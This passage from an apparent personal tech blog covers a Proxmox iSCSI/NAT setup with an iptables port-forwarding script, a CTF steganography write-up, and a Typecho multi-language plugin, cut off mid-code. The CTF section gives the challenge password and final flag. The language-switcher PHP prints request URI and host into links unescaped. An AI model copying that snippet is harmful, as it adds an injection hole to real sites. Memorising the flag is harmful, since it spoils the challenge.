node.session.auth.chap_algs -v MD5 (I don't know why the auth info needs to be written separately, but testing shows it won't log in without rewriting it.) Then, use: iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 --login iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 --login to log into the Targets. Then use: iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.startup -v automatic iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.startup -v automatic to enable automatic mounting on boot. At this point, checking disks with tools like lsblk should reveal two additional hard drives; in my case, sdb and sdc appeared. Configure Multipath To identify if it's a multipath device, I tried: /usr/lib/udev/scsi_id --whitelisted --device=/dev/sdb /usr/lib/udev/scsi_id --whitelisted --device=/dev/sdc Checking the scsi_id of the two disk devices revealed they were identical, confirming they are the same disk using multi-path for load balancing and failover. 
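If there are more than two candidate disks, the scsi_id comparison can be wrapped in a tiny script; a sketch (the device names are just the ones from my setup):

import subprocess

def scsi_id(dev):
    # Return the WWID reported by scsi_id for a block device.
    out = subprocess.run(
        ["/usr/lib/udev/scsi_id", "--whitelisted", f"--device={dev}"],
        capture_output=True, text=True, check=True,
    )
    return out.stdout.strip()

ids = {dev: scsi_id(dev) for dev in ("/dev/sdb", "/dev/sdc")}
print(ids)
if len(set(ids.values())) == 1:
    print("Identical WWIDs: these are two paths to one LUN, use multipath.")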
Install multipath-tools using apt: apt install multipath-tools Then, create /etc/multipath.conf and add: defaults { user_friendly_names yes find_multipaths yes } Configure multipathd to start on boot: systemctl start multipathd systemctl enable multipathd Then, use the following command to scan and automatically configure the multipath device: multipath -ll It should output: mpatha(360014056229953ef442476e85501bfd7)dm-0LIO-ORG,TCMU device size=500G features='1 queue_if_no_path' hwhandler='1 alua'wp=rw |-+- policy='service-time 0' prio=50 status=active | `- 14:0:0:152 sdb 8:16 active ready running `-+- policy='service-time 0' prio=50 status=active `- 14:0:0:152 sdc 8:16 active ready running This shows the two disks have been recognized as a single multipath device. Now, you can find the multipath disk under /dev/mapper/: root@localhost:/dev/mapper# ls control mpatha mpatha is the multipath aggregated disk. If it's not scanned, try using: rescan-scsi-bus.sh to rescan the SCSI bus and try again. If the command is not found, install it via apt install sg3-utils. If all else fails, just reboot. Configure Proxmox VE to Use the Data Disk Because we used multipath, we cannot directly add an iSCSI type storage. Use the following commands to create the PV and VG: pvcreate /dev/mapper/mpatha vgcreate <vg name> /dev/mapper/mpatha Here, I configured the entire disk as a PV. You could also create a separate partition for this. After completion, open the Proxmox VE management interface, go to Datacenter - Storage, click Add - LVM, select the name of the VG you just created for Volume group, give it an ID (name), and click Add. At this point, all configurations from the original system should have been migrated. Configure NAT and Port Forwarding NAT Because only one IPv4 address was purchased, NAT needs to be configured to allow all VMs to access the internet normally. Open /etc/network/interfaces and add the following content: auto vmbr0 iface vmbr0 inet static address 192.168.100.1 netmask 255.255.255.0 bridge_ports none bridge_stp off bridge_fd 0 post-up echo 1 > /proc/sys/net/ipv4/ip_forward post-up iptables -t nat -A POSTROUTING -s 192.168.100.0/24 -o ens6f0 -j MASQUERADE post-up iptables -t raw -I PREROUTING -i fwbr+ -j CT --zone 1 post-up iptables -A FORWARD -i vmbr0 -j ACCEPT post-down iptables -t nat -D POSTROUTING -s 192.168.100.0/24 -o ens6f0 -j MASQUERADE post-down iptables -t raw -D PREROUTING -i fwbr+ -j CT --zone 1 post-down iptables -D FORWARD -i vmbr0 -j ACCEPT Here, vmbr0 is the NAT bridge, with the IP segment 192.168.100.0/24. Traffic from this segment will be translated to the IP of the external network interface ens6f0 for outgoing traffic, and translated back to the original IP upon receiving replies, enabling IP sharing. Then, use: ifreload -a to reload the configuration. Now, the VMs should be able to access the internet. Just configure a static IP within the 192.168.100.0/24 range during installation, set the default gateway to 192.168.100.1, and configure the DNS address. Port Forwarding Got lazy, directly prompted an AI. 
Had an AI write a configuration script /usr/local/bin/natmgr: #!/bin/bash # =================Configuration Area================= # Public network interface name (Please modify according to your actual situation) PUB_IF="ens6f0" # ==================================================== ACTION=$1 ARG1=$2 ARG2=$3 ARG3=$4 ARG4=$5 # Check if running as root if [ "$EUID" -ne 0 ]; then echo "Please run this script with root privileges" exit 1 fi # Generate random ID (6 characters) generate_id() { # Introduce nanoseconds and random salt to ensure ID uniqueness even if the script runs quickly echo "$RANDOM $(date +%s%N)" | md5sum | head -c 6 } # Show help information usage() { echo "Usage: $0 {add|del|list|save} [parameters]" echo "" echo "Commands:" echo " add <Public Port> <Internal IP> <Internal Port> [Protocol] Add forwarding rule" echo " [Protocol] optional: tcp, udp, both (default: both)" echo " del <ID> Delete forwarding rule by ID" echo " list View all current forwarding rules" echo " save Save current rules to persist after reboot (Must run!)" echo "" echo "Examples:" echo " $0 add 8080 192.168.100.101 80 both" echo " $0 save" echo "" } # Internal function: add single protocol rule _add_single_rule() { local PROTO=$1 local L_PORT=$2 local T_IP=$3 local T_PORT=$4 local RULE_ID=$(generate_id) local COMMENT="NAT_ID:${RULE_ID}" # 1. Add DNAT rule (PREROUTING chain) iptables -t nat -A PREROUTING -i $PUB_IF -p $PROTO --dport $L_PORT -j DNAT --to-destination $T_IP:$T_PORT -m comment --comment "$COMMENT" # 2. Add FORWARD rule (Allow packet passage) iptables -A FORWARD -p $PROTO -d $T_IP --dport $T_PORT -m comment --comment "$COMMENT" -j ACCEPT # Output result printf "%-10s %-10s %-10s %-20s %-10s\n" "$RULE_ID" "$PROTO" "$L_PORT" "$T_IP:$T_PORT" "Success" # Remind user to save echo "Please run '$0 save' to ensure rules persist after reboot." } # Main add function add_rule() { local L_PORT=$1 local T_IP=$2 local T_PORT=$3 local PROTO_REQ=${4:-both} # Default to both if [[ -z "$L_PORT" || -z "$T_IP" || -z "$T_PORT" ]]; then echo "Error: Missing parameters" usage exit 1 fi # Convert to lowercase PROTO_REQ=$(echo "$PROTO_REQ" | tr '[:upper:]' '[:lower:]') echo "Adding rule..." printf "%-10s %-10s %-10s %-20s %-10s\n" "ID" "Protocol" "Public Port" "Target Address" "Status" echo "------------------------------------------------------------------" if [[ "$PROTO_REQ" == "tcp" ]]; then _add_single_rule "tcp" "$L_PORT" "$T_IP" "$T_PORT" elif [[ "$PROTO_REQ" == "udp" ]]; then _add_single_rule "udp" "$L_PORT" "$T_IP" "$T_PORT" elif [[ "$PROTO_REQ" == "both" ]]; then _add_single_rule "tcp" "$L_PORT" "$T_IP" "$T_PORT" _add_single_rule "udp" "$L_PORT" "$T_IP" "$T_PORT" else echo "Error: Unsupported protocol '$PROTO_REQ'. Please use tcp, udp, or both." exit 1 fi echo "------------------------------------------------------------------" } # Delete rule (Delete in reverse line number order) del_rule() { local RULE_ID=$1 if [[ -z "$RULE_ID" ]]; then echo "Error: Please provide rule ID" usage exit 1 fi echo "Searching for rule with ID [${RULE_ID}]..." local FOUND=0 # --- Clean NAT table (PREROUTING) --- LINES=$(iptables -t nat -nL PREROUTING --line-numbers | grep "NAT_ID:${RULE_ID}" | awk '{print $1}' | sort -rn) if [[ ! 
-z "$LINES" ]]; then for line in $LINES; do iptables -t nat -D PREROUTING $line echo "Deleted NAT table PREROUTING chain line $line" FOUND=1 done fi # --- Clean Filter table (FORWARD) --- LINES=$(iptables -t filter -nL FORWARD --line-numbers | grep "NAT_ID:${RULE_ID}" | awk '{print $1}' | sort -rn) if [[ ! -z "$LINES" ]]; then for line in $LINES; do iptables -t filter -D FORWARD $line echo "Deleted Filter table FORWARD chain line $line" FOUND=1 done fi if [[ $FOUND -eq 0 ]]; then echo "No rule found with ID $RULE_ID." else echo "Delete operation completed." echo "Please run '$0 save' to update the persistent configuration file." fi } # Save rules to disk (New feature) save_rules() { echo "Saving current iptables rules..." # netfilter-persistent is the service managing iptables-persistent in Debian/Proxmox if command -v netfilter-persistent &> /dev/null; then netfilter-persistent save if [ $? -eq 0 ]; then echo "✅ Rules successfully saved to /etc/iptables/rules.v4, will be automatically restored after system reboot." else echo "❌ Failed to save rules. Please check the status of the 'netfilter-persistent' service." fi else echo "Warning: 'netfilter-persistent' command not found." echo "Please ensure the 'iptables-persistent' package is installed." echo "Install command: apt update && apt install iptables-persistent" fi } # List rules list_rules() { echo "Current Port Forwarding Rules List:" printf "%-10s %-10s %-10s %-20s %-10s\n" "ID" "Protocol" "Public Port" "Target Address" "Target Port" echo "------------------------------------------------------------------" # Parse iptables output iptables -t nat -nL PREROUTING -v | grep "NAT_ID:" | while read line; do id=$(echo "$line" | grep -oP '(?<=NAT_ID:)[^ ]*') # Extract protocol if echo "$line" | grep -q "tcp"; then proto="tcp"; else proto="udp"; fi # Extract port after dpt: l_port=$(echo "$line" | grep -oP '(?<=dpt:)[0-9]+') # Extract IP:Port after to: target=$(echo "$line" | grep -oP '(?<=to:).*') t_ip=${target%:*} t_port=${target#*:} printf "%-10s %-10s %-10s %-20s %-10s\n" "$id" "$proto" "$l_port" "$t_ip" "$t_port" done } # Main logic case "$ACTION" in add) add_rule "$ARG1" "$ARG2" "$ARG3" "$ARG4" ;; del) del_rule "$ARG1" ;; list) list_rules exit 0 ;; save) save_rules ;; *) usage exit 1 ;; esac save_rules This script automatically adds/deletes iptables rules for port forwarding. Remember to chmod +x. Use iptables-persistent to save the configuration and load it automatically on boot: apt install iptables-persistent During configuration, you will be asked whether to save the current rules; Yes or No is fine. When adding a forwarding rule, use natmgr add <host listen port> <VM internal IP> <VM port> [tcp/udp/both]. The script will automatically assign a unique ID. Use natmgr del <ID> to delete. Use natmgr list to view the existing forwarding list. Reference Articles: bin456789/reinstall: 一键DD/重装脚本 (One-click reinstall OS on VPS) - GitHub Install Proxmox VE on Debian 12 Bookworm - Proxmox VE PVE连接 TrueNAS iSCSI存储实现本地无盘化_pve iscsi-CSDN博客 ProxmoxVE (PVE) NAT 网络配置方法 - Oskyla 烹茶室
29/11/2025
115 Views
0 Comments
0 Stars
2025 Gujianshan Misc Fruit WriteUp
Open the file using 010 Editor and find a ZIP header at the end: Extract it and open it to find no password, just a string of base64: 5L2g6L+Z6Iu55p6c5oCO5LmI6L+Z5LmI5aSnCuWkp+S4quWEv+aJjeWAvOmSseS9oOimgeS4jeimgQrov5nmoYPlrZDmgI7kuYjov5nkuYjnoawK56Gs5piv5Zug5Li65paw6bKc5L2g6KaB6L2v55qE6L+Y5piv57Ov55qECui/meilv+eTnOiDveWQg+WQl+eci+i1t+adpeacieeCueS4jeeGnwrkuI3nhp/nmoTopb/nk5zmgI7kuYjlj6/og73kvaDov5nlsLHmmK/nrYnnnYDlkIPnlJznmoQK5L2g6L+Z5p+a5a2Q6L+Z5LmI5bCPCuWwj+W3p+eahOaJjeWlveWQg+S9oOimgeWkp+S4queahOi/mOaYr+WlveWQg+eahArov5nmqZnlrZDmgI7kuYjov5nkuYjphbgK6YW45omN5piv5q2j5a6X55qE5qmZ5a2Q5L2g6KaB5piv55Sc55qE5Y675Yir5a6255yLCui/memmmeiVieacieeCueW8rwrlvK/nmoTpppnolYnmm7TnlJzkvaDkuI3mh4IK5L2g6L+Z5qKo5a2Q5piv5LiN5piv5pyJ54K556GsCuehrOaYr+WboOS4uuaWsOmynOWQg+edgOacieWPo+aEnwrov5nokaHokITmgI7kuYjov5nkuYjlsI8K5bCP55qE6JGh6JCE5pu05rWT57yp55Sc5ZGz Decode to get: 你这苹果怎么这么大 大个儿才值钱你要不要 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 不熟的西瓜怎么可能你这就是等着吃甜的 你这柚子这么小 小巧的才好吃你要大个的还是好吃的 这橙子怎么这么酸 酸才是正宗的橙子你要是甜的去别家看 这香蕉有点弯 弯的香蕉更甜你不懂 你这梨子是不是有点硬 硬是因为新鲜吃着有口感 这葡萄怎么这么小 小的葡萄更浓缩甜味 At the same time, it is found that there is still part of unrecognized data at the end of the exported zip: Based on the 1A 9E 97 BA 2A, it can be inferred that this is OurSecret steganography. Open it with the OurSecret tool and find that a password is required. Try the password shuiguo to extract a txt file: 你这柚子这么小 你这柚子这么小 你这柚子这么小 你这梨子是不是有点硬 你这柚子这么小 大个儿才值钱你要不要 你这柚子这么小 小巧的才好吃你要大个的还是好吃的 小巧的才好吃你要大个的还是好吃的 弯的香蕉更甜你不懂 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 不熟的西瓜怎么可能你这就是等着吃甜的 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 不熟的西瓜怎么可能你这就是等着吃甜的 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 你这苹果怎么这么大 你这柚子这么小 大个儿才值钱你要不要 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 你这柚子这么小 这西瓜能吃吗看起来有点不熟 你这柚子这么小 这桃子怎么这么硬 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 你这柚子这么小 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 你这柚子这么小 硬是因为新鲜你要软的还是糯的 你这柚子这么小 这西瓜能吃吗看起来有点不熟 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 你这柚子这么小 不熟的西瓜怎么可能你这就是等着吃甜的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 你这柚子这么小 大个儿才值钱你要不要 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜吃着有口感 It is found that this corresponds one-to-one with the previously extracted statements. Since there are 16 statements extracted earlier, it is speculated that they represent hexadecimal digits, corresponding to 0-f respectively. Then, map the OurSecret decrypted content to hexadecimal numbers to obtain: 666c61677b33653235393630613739646263363962363734636434656336376137326336327d. Write a Python script to convert the hexadecimal string to ASCII characters in groups of two: hex_string = "666c61677b33653235393630613739646263363962363734636434656336376137326336327d" ascii_string = ''.join([chr(int(hex_string[i:i+2], 16)) for i in range(0, len(hex_string), 2)]) print(ascii_string) Get the Flag: flag{3e25960a79dbc69b674cd4ec67a72c62}
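For completeness, the sentence-to-hex mapping done by hand above can also be scripted. A sketch assuming the base64-decoded dialogue is saved as dialogue.txt (16 lines, in order, standing for digits 0 through f) and the OurSecret output as extracted.txt (both file names are mine):

# Map each of the 16 dialogue sentences to a hex digit by its position,
# translate the extracted lines into a hex string, then decode to ASCII.
with open("dialogue.txt", encoding="utf-8") as f:
    sentences = [line.strip() for line in f if line.strip()]

digit_of = {s: format(i, "x") for i, s in enumerate(sentences)}

with open("extracted.txt", encoding="utf-8") as f:
    hex_string = "".join(digit_of[line.strip()] for line in f if line.strip())

print(bytes.fromhex(hex_string).decode())  # flag{3e25960a79dbc69b674cd4ec67a72c62}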
29/11/2025
359 Views
0 Comments
4 Stars
Configuring a Simple Multi-language Solution for Typecho
I wanted to add internationalization support to my blog, providing a separate English version for each post and page. However, after searching online, I found that Typecho has poor support for i18n. Eventually, I designed my own solution and am documenting it here. This article assumes you have some basic understanding of PHP, Nginx, and Typecho's core logic. Analysis Requirements Need to provide both Chinese and English versions for each post and page. Need to configure a language switcher so users can easily switch languages on the frontend. Need search engines to correctly identify and index the multi-language versions of the content. Proposed Solution There are roughly two main schemes for distinguishing between Chinese and English content: Use a separate parameter, like accessing posts with /?lang=zh-CN and /?lang=en-US. However, this scheme is relatively difficult to implement and less friendly for search engine indexing. Distinguish via the URL path, e.g., https://<host>/article for the Chinese page and https://<host>/en/article for the English page. This is simpler to configure (essentially setting up two separate Typecho instances) and is more search engine friendly. The challenge is that comments and view counts need to be manually synchronized. After summarizing, I chose the second scheme and planned to implement multi-language support by creating a new Typecho instance directly under the /en/ path. Implementation Plan First, duplicate the blog instance into two copies: one for Chinese and one for English, then translate the English copy. Modify the frontend code to implement the language switcher. To ensure the article URLs between the two sites only differ by the /en prefix, the cid (content ID) for corresponding articles must be the same. Since cid is auto-incremented based on the order of creating posts and attachments, I plan to write a sync plugin. When a post is published on the Chinese site, it automatically inserts a corresponding article with the same cid in the English database. Modify the SiteMap plugin. Because a sitemap cannot both contain page links and references to other sitemaps, the main site needs to create two sitemaps: one main sitemap containing the Chinese site pages, and another index sitemap responsible for indexing both the Chinese and English sitemaps. Add the hreflang attribute within the <head></head> section to inform search engines about the multi-language handling. Link the view counts and like counts from the English site to the Chinese database. Sync the comments between two instances. Let's Do It Create the English Instance Copy the entire website directory and place it in the /en/ folder under the original web root. Also, duplicate the database; I named the new one typecho_en. Next, configure URL rewrite (pseudo-static) rules for both instances: location /en/ { if (!-e $request_filename) { rewrite ^(.*)$ /en/index.php$1 last; } } location / { if (!-e $request_filename) { rewrite ^(.*)$ /index.php$1 last; } } The reason for wrapping the main Chinese instance's rules in a location block is that during testing, I found that without it, the English instance might be parsed as part of the Chinese instance, leading to 404 errors. Also, modify the database configuration in <webroot>/en/config.inc.php to point to the English instance's database. At this point, accessing <host>/en/ should display a site identical to the main Chinese site. 
Modify Typecho Language This step might be optional since the frontend language is largely determined by the theme. Changing Typecho's backend language isn't strictly necessary but helps for consistency (and makes it easy to tell which admin panel you're in!). Simply refer to the official Typecho multi-language support on GitHub. Download the language pack from the Releases and extract it to <webroot>/en/usr/langs/. Then, navigate to https://<host>/en/admin/options-general.php, where you should see the language setting option. Change it to English. Translate the Theme This is the most tedious step. I use the Joe theme. Go to <webroot>/en/usr/themes/Joe and translate all the Chinese text related to display into English. There's no very convenient method here; machine translation often sounds awkward, so I opted for manual translation. Note that some frontend configurations are within JS files, not just PHP source files. These need translation too. Translate Articles This step is self-explanatory. Translate the articles under /en/ one by one into English and save them. Configure Article Sync Publishing This step ensures the cid remains synchronized between corresponding articles on both sites. Since cid relates to the access URL, keeping them in sync simplifies the language switcher configuration later—just adding or removing /en from the host. cid is an auto-incrementing primary key field in the typecho_contents table. Its assignment is also related to attachments in Typecho. Since I plan to upload all attachments to the Chinese site, without special handling, the cid values can easily become misaligned, increasing subsequent work. Therefore, my chosen solution is to use AI to help write a plugin that triggers when the Chinese site publishes an article. It reads the cid assigned by the Chinese site and writes a corresponding entry into the English site's database. 
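Independent of the plugin itself, it helps to have a quick way to confirm that the two typecho_contents tables actually stay aligned. A sketch using PyMySQL (credentials are placeholders; the database names and the typecho_ prefix follow this article):

import pymysql

def fetch_posts(db):
    conn = pymysql.connect(host="localhost", user="root", password="secret",
                           database=db, charset="utf8mb4")
    with conn.cursor() as cur:
        cur.execute("SELECT cid, slug FROM typecho_contents WHERE type = 'post'")
        rows = dict(cur.fetchall())  # {cid: slug}
    conn.close()
    return rows

cn = fetch_posts("typecho")     # Chinese instance
en = fetch_posts("typecho_en")  # English instance

print("cids missing on the English site:", sorted(set(cn) - set(en)))
print("cids whose slug differs:", [c for c in cn.keys() & en.keys() if cn[c] != en[c]])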
Create the file <webroot>/usr/plugins/SyncToEnglish/Plugin.php and fill it with the following content: <?php if (!defined('__TYPECHO_ROOT_DIR__')) exit; /** * Sync Chinese Articles to English Database * * @package SyncToEnglish * @author ChatGPT, iYoRoy * @version 1.0.0 * @link https://example.com */ class SyncToEnglish_Plugin implements Typecho_Plugin_Interface { public static function activate() { Typecho_Plugin::factory('Widget_Contents_Post_Edit')->finishPublish = [__CLASS__, 'push']; return 'SyncToEnglish plugin activated: Empty corresponding articles will be automatically created in the English database when Chinese articles are published.'; error_log("[SyncToEnglish] Plugin activated successfully"); } public static function deactivate() { return 'SyncToEnglish plugin deactivated'; } public static function config(Typecho_Widget_Helper_Form $form) { $host = new Typecho_Widget_Helper_Form_Element_Text('host', NULL, 'localhost', _t('English DB Host')); $user = new Typecho_Widget_Helper_Form_Element_Text('user', NULL, 'root', _t('English DB Username')); $password = new Typecho_Widget_Helper_Form_Element_Password('password', NULL, NULL, _t('English DB Password')); $database = new Typecho_Widget_Helper_Form_Element_Text('database', NULL, 'typecho_en', _t('English DB Name')); $port = new Typecho_Widget_Helper_Form_Element_Text('port', NULL, '3306', _t('English DB Port')); $charset = new Typecho_Widget_Helper_Form_Element_Text('charset', NULL, 'utf8mb4', _t('Charset')); $prefix = new Typecho_Widget_Helper_Form_Element_Text('prefix', NULL, 'typecho_', _t('Table Prefix')); $form->addInput($host); $form->addInput($user); $form->addInput($password); $form->addInput($database); $form->addInput($port); $form->addInput($charset); $form->addInput($prefix); } public static function personalConfig(Typecho_Widget_Helper_Form $form) {} public static function push($contents, $widget) { $options = Helper::options(); $config = $options->plugin('SyncToEnglish'); // Get article info from Chinese database $cnDb = Typecho_Db::get(); if (is_array($contents) && isset($contents['cid'])) { $cid = $contents['cid']; $title = $contents['title']; } elseif (is_object($contents) && isset($contents->cid)) { $cid = $contents->cid; $title = $contents->title; } else { $db = Typecho_Db::get(); $row = $db->fetchRow($db->select()->from('table.contents')->order('cid', Typecho_Db::SORT_DESC)->limit(1)); $cid = $row['cid']; $title = $row['title']; error_log("[SyncToEnglish DEBUG] CID not found in param, fallback to latest cid={$cid}\n", 3, __DIR__ . 
'/debug.log'); } $article = $cnDb->fetchRow($cnDb->select()->from('table.contents')->where('cid = ?', $cid)); if (!$article) return; $enDb = new Typecho_Db('Mysql', $config->prefix); $enDb->addServer([ 'host' => $config->host, 'user' => $config->user, 'password' => $config->password, 'charset' => $config->charset, 'port' => (int)$config->port, 'database' => $config->database ], Typecho_Db::READ | Typecho_Db::WRITE); try { $exists = $enDb->fetchRow($enDb->select()->from('table.contents')->where('cid = ?', $article['cid'])); if ($exists) { $enDb->query($enDb->update('table.contents') ->rows([ // 'title' => $article['title'], 'slug' => $article['slug'], 'modified' => $article['modified'] ]) ->where('cid = ?', $article['cid']) ); } else { $enDb->query($enDb->insert('table.contents')->rows([ 'cid' => $article['cid'], 'title' => $article['title'], 'slug' => $article['slug'], 'created' => $article['created'], 'modified' => $article['modified'], 'type' => $article['type'], 'status' => $article['status'], 'authorId' => $article['authorId'], 'views' => 0, 'text' => $article['text'], 'allowComment' => $article['allowComment'], 'allowFeed' => $article['allowFeed'], 'allowPing' => $article['allowPing'] ])); } } catch (Exception $e) { error_log('[SyncToEnglish] Sync failed: ' . $e->getMessage()); } } } Then, go to the admin backend, enable the plugin, and configure the English database information. After completion, publishing an article on the Chinese site should automatically publish an article with the same cid on the English site. Configure the Language Switcher Since we have synchronized the article cid, switching languages now only requires modifying the URL by adding or removing the /en/ prefix. We can create a switcher using PHP and place it in the theme's header: <!-- Language Selector --> <div class="joe_dropdown" trigger="hover" placement="60px"> <div class="joe_dropdown__link"> <a href="#" rel="nofollow">Language</a> <svg class="joe_dropdown__link-icon" viewBox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="14" height="14"> <path d="M561.873 725.165c-11.262 11.262-26.545 21.72-41.025 18.502-14.479 2.413-28.154-8.849-39.415-18.502L133.129 375.252c-17.697-17.696-17.697-46.655 0-64.352s46.655-17.696 64.351 0l324.173 333.021 324.977-333.02c17.696-17.697 46.655-17.697 64.351 0s17.697 46.655 0 64.351L561.873 725.165z" fill="var(--main)" /> </svg> </div> <nav class="joe_dropdown__menu"> <?php // Get the current full URL $current_url = $_SERVER['REQUEST_URI']; $host = $_SERVER['HTTP_HOST']; // Check if there is an English prefix "/en/" if (strpos($current_url, '/en/') === 0) { $current_url = substr_replace($current_url, '', 0, 3); } $new_url_cn = 'https://' . $host . $current_url; $new_url_en = 'https://' . $host . '/en' . $current_url; // Generate the two hyperlinks echo '<a href="' . $new_url_cn . '">简体中文</a>'; echo '<a href="' . $new_url_en . '">English</a>'; ?> </nav> </div> This needs to be added to both the Chinese and English instances. After this, the language selector should be available globally. For the Joe theme I use, separate language selectors needed to be written for mobile and PC views. Modify the SiteMap Plugin To help search engines index the English pages faster, I decided to modify the SiteMap plugin to include the English site's pages. There are two types of sitemaps: sitemapindex (for indexing sub-sitemaps) and urlset (for containing page URLs). I use the joyqi/typecho-plugin-sitemap plugin. 
Based on this, I changed the default /sitemap.xml to a sitemapindex, created a new route /sitemap_cn.xml to hold the Chinese site's sitemap, left the English site's plugin unchanged (its sitemap remains at /en/sitemap.xml), and had the main index sitemap reference both /sitemap_cn.xml and /en/sitemap.xml. Modify the SiteMap's Plugin.php: /** * Activate plugin method, if activated failed, throw exception will disable this plugin. */ public static function activate() { Helper::addRoute( - 'sitemap', + 'sitemap_index', '/sitemap.xml', Generator::class, - 'generate', + 'generate_index', 'index' ); + Helper::addRoute( + 'sitemap_cn', + '/sitemap_cn.xml', + Generator::class, + 'generate_cn', + 'index' + ); } /** * Deactivate plugin method, if deactivated failed, throw exception will enable this plugin. */ public static function deactivate() { - Helper::removeRoute('sitemap'); + Helper::removeRoute('sitemap_index'); + Helper::removeRoute('sitemap_cn'); } {collapse} {collapse-item label="Complete code"} <?php namespace TypechoPlugin\Sitemap; use Typecho\Plugin\PluginInterface; use Typecho\Widget\Helper\Form; use Utils\Helper; if (!defined('__TYPECHO_ROOT_DIR__')) { exit; } /** * Plugin to automatically generate a sitemap for Typecho. * The sitemap URL is: http(s)://yourdomain.com/sitemap.xml * * @package Sitemap Plugin * @author joyqi * @version 1.0.0 * @since 1.2.1 * @link https://github.com/joyqi/typecho-plugin-sitemap */ class Plugin implements PluginInterface { /** * Activate plugin method, if activated failed, throw exception will disable this plugin. */ public static function activate() { Helper::addRoute( 'sitemap_index', '/sitemap.xml', Generator::class, 'generate_index', 'index' ); Helper::addRoute( 'sitemap_cn', '/sitemap_cn.xml', Generator::class, 'generate_cn', 'index' ); } /** * Deactivate plugin method, if deactivated failed, throw exception will enable this plugin. */ public static function deactivate() { Helper::removeRoute('sitemap_index'); Helper::removeRoute('sitemap_cn'); } /** * Plugin config panel render method. * * @param Form $form */ public static function config(Form $form) { $sitemapBlock = new Form\Element\Checkbox( 'sitemapBlock', [ 'posts' => _t('Generate post links'), 'pages' => _t('Generate page links'), 'categories' => _t('Generate category links'), 'tags' => _t('Generate tag links'), ], ['posts', 'pages', 'categories', 'tags'], _t('Sitemap Display') ); $updateFreq = new Form\Element\Select( 'updateFreq', [ 'daily' => _t('Daily'), 'weekly' => _t('Weekly'), 'monthly' => _t('Monthly or less often'), ], 'daily', _t('Update Frequency') ); // $externalSitemap = new Typecho_Widget_Helper_Form_Element_Text('externalSitemap', NULL, '', _t('Additional Sitemap')); $form->addInput($sitemapBlock->multiMode()); $form->addInput($updateFreq); // $form->addInput($externalSitemap); } /** * Plugin personal config panel render method. * * @param Form $form */ public static function personalConfig(Form $form) { // TODO: Implement personalConfig() method. 
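// (No per-user settings are needed for the sitemap, so this method can stay unimplemented.)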
} } {/collapse-item} {/collapse} Modify the SiteMap's Generator.php: class Generator extends Contents { + public function generate_index(){ + $sitemap = '<?xml version="1.0" encoding="UTF-8"?> +<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> + <sitemap> + <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> + </sitemap> + <sitemap> + <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> + </sitemap> +</sitemapindex>'; + $this->response->throwContent($sitemap, 'text/xml'); + } + /** * @return void */ - public function generate() + public function generate_cn() { $sitemap = '<?xml version="1.0" encoding="' . $this->options->charset . '"?>' . PHP_EOL; ... {collapse} {collapse-item label="Complete code"} <?php namespace TypechoPlugin\Sitemap; use Widget\Base\Contents; use Widget\Contents\Page\Rows; use Widget\Contents\Post\Recent; use Widget\Metas\Category\Rows as CategoryRows; use Widget\Metas\Tag\Cloud; if (!defined('__TYPECHO_ROOT_DIR__')) { exit; } /** * Sitemap Generator */ class Generator extends Contents { public function generate_index(){ $sitemap = '<?xml version="1.0" encoding="UTF-8"?> <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> </sitemap> <sitemap> <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> </sitemap> </sitemapindex>'; $this->response->throwContent($sitemap, 'text/xml'); } /** * @return void */ public function generate_cn() { $sitemap = '<?xml version="1.0" encoding="' . $this->options->charset . '"?>' . PHP_EOL; $sitemap .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"' . ' xmlns:news="http://www.google.com/schemas/sitemap-news/0.9"' . ' xmlns:xhtml="http://www.w3.org/1999/xhtml"' . ' xmlns:image="http://www.google.com/schemas/sitemap-image/1.1"' . ' xmlns:video="http://www.google.com/schemas/sitemap-video/1.1">' . PHP_EOL; // add homepage $sitemap .= <<<EOF <url> <loc>{$this->options->siteUrl}</loc> <changefreq>daily</changefreq> <priority>1.0</priority> </url> EOF; // add posts if (in_array('posts', $this->options->plugin('Sitemap')->sitemapBlock)) { $postsCount = $this->size($this->select() ->where('table.contents.status = ?', 'publish') ->where('table.contents.created < ?', $this->options->time) ->where('table.contents.type = ?', 'post')); $posts = Recent::alloc(['pageSize' => $postsCount]); $freq = $this->options->plugin('Sitemap')->updateFreq ==='monthly' ? 'monthly' : 'weekly'; while 